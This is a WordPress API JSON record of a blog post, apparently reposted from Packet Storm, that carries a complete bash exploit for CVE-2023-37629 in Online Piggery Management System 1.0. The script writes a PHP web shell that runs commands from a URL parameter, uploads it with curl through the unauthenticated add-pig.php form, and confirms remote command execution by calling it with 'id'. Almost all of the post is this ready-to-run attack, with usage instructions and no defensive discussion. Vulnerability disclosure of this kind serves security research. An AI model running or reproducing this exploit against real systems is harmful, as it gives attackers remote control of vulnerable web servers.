{"id":45365,"date":"2023-07-20T20:59:43","date_gmt":"2023-07-20T16:59:43","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173656\/opms10-shell.txt"},"modified":"2023-07-22T11:39:48","modified_gmt":"2023-07-22T07:09:48","slug":"online-piggery-management-system-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/online-piggery-management-system-1-0-shell-upload\/","title":{"rendered":"Online Piggery Management System 1.0 Shell Upload"},"content":{"rendered":"<p>#!\/bin\/bash<br \/>\n# Exploit Title: Online Piggery Management System v1.0 &#8211; unauthenticated file upload vulnerability<br \/>\n# Date: July 12 2023<br \/>\n# Exploit Author: 1337kid<br \/>\n# Software Link: https:\/\/www.sourcecodester.com\/php\/11814\/online-pig-management-system-basic-free-version.html<br \/>\n# Version: 1.0<br \/>\n# Tested on: Ubuntu<br \/>\n# CVE : CVE-2023-37629<br \/>\n#<br \/>\n# chmod +x exploit.sh<br \/>\n# .\/exploit.sh web_url<br \/>\n# .\/exploit.sh http:\/\/127.0.0.1:8080\/<\/p>\n<p>echo &#8221; _____ _____ ___ __ ___ ____ ________ __ ___ ___ &#8221;<br \/>\necho &#8221; \/ __\\\\ \\\\ \/ \/ __|_|_ ) \\\\_ )__ \/__|__ \/__ \/ \/|_ ) _ \\\\&#8221;<br \/>\necho &#8221; | (__ \\\\ V \/| _|___\/ \/ () \/ \/ |_ \\\\___|_ \\\\ \/ \/ _ \\\\\/ \/\\\\_, \/&#8221;<br \/>\necho &#8221; \\\\___| \\\\_\/ |___| \/___\\\\__\/___|___\/ |___\/\/_\/\\\\___\/___|\/_\/ &#8221;<br \/>\necho &#8221; @1337kid&#8221;<br \/>\necho<\/p>\n<p>if [[ $1 == &#8221; ]]; then<br \/>\necho &#8220;No URL specified!&#8221;<br \/>\nexit<br \/>\nfi<\/p>\n<p>base_url=$1<\/p>\n<p>unauth_file_upload() {<br \/>\n# CVE-2023-37629 &#8211; File upload vuln<br \/>\necho &#8220;Generating shell.php&#8221;<br \/>\n#===========<br \/>\ncat &gt; shell.php &lt;&lt; EOF<br \/>\n&lt;?php system(\\$_GET[&#8216;cmd&#8217;]); ?&gt;<br \/>\nEOF<br \/>\n#===========<br \/>\necho &#8220;done&#8221;<br \/>\ncurl -s -F pigphoto=@shell.php -F submit=pwned $base_url\/add-pig.php &gt; \/dev\/null<br \/>\nreq=$(curl -s -I $base_url&#8221;uploadfolder\/shell.php?cmd=id&#8221; | head -1 | awk &#8216;{print $2}&#8217;)<br \/>\nif [[ $req == &#8220;200&#8221; ]]; then<br \/>\necho &#8220;Shell uploaded to $(echo $base_url)uploadfolder\/shell.php&#8221;<br \/>\nelse<br \/>\necho &#8220;Failed to upload a shell&#8221;<br \/>\nfi<\/p>\n<p>}<\/p>\n<p>req=$(curl -I -s $base_url | head -1 | awk &#8216;{print $2}&#8217;)<br \/>\nif [[ $req -eq &#8220;200&#8221; ]]; then<br \/>\nunauth_file_upload<br \/>\nelse<br \/>\necho &#8220;Error&#8221;<br \/>\necho &#8220;Status Code: $req&#8221;<br \/>\nfi<\/p>\n","protected":false},"excerpt":{"rendered":"<p>#!\/bin\/bash # Exploit Title: Online Piggery Management System v1.0 &#8211; unauthenticated file upload vulnerability # Date: July 12 2023 # Exploit Author: 1337kid # Software Link: https:\/\/www.sourcecodester.com\/php\/11814\/online-pig-management-system-basic-free-version.html # Version: 1.0 # Tested on: Ubuntu # CVE : CVE-2023-37629 # # chmod +x exploit.sh # .\/exploit.sh web_url # .\/exploit.sh http:\/\/127.0.0.1:8080\/ echo &#8221; _____ _____ ___ __ &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45365","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45365","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45365"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45365\/revisions"}],"predecessor-version":[{"id":45466,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45365\/revisions\/45466"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45365"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45365"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45365"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}